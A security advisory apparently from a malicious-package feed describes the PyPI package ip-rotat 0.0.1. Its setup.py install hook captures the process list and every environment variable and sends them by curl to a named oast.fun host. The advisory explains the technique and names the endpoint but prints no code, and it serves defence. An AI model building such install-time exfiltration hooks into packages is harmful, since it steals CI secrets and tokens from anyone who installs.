ip-rotat @0.0.1

Summary

On pip install or pip download , setup.py registers overridden install and egg_info cmdclass entries that execute ps -elf to capture the host's process listing and iterate the entire os.environ mapping into a URL-encoded body, then POST the combined payload via curl to http://gjampdwmdjmppwedtkpbbdkq05f6iiz6r.oast.fun over plaintext HTTP. Bulk env scraping at install time leaks any CI/CD secrets present in the environment (AWS keys, GitHub/npm/PyPI tokens, etc.) along with a system-wide process listing. The package ships no actual ip-rotation functionality — setup.py contains only the exfiltration payload, the package name ip_rotat is a one-character truncation of common ip-rotator -style libraries, and the README references the this_is_fine_wuzzi install-time-code-execution PoC. The combination of name confusion, zero advertised functionality, and an automatic install-time exfil hook is a supply-chain attack against any installer.

Source: amazon-inspector (e85ab2724beee13bb6c2658c5bf5d50069c83619f062d39935226ff1fee1c0a3)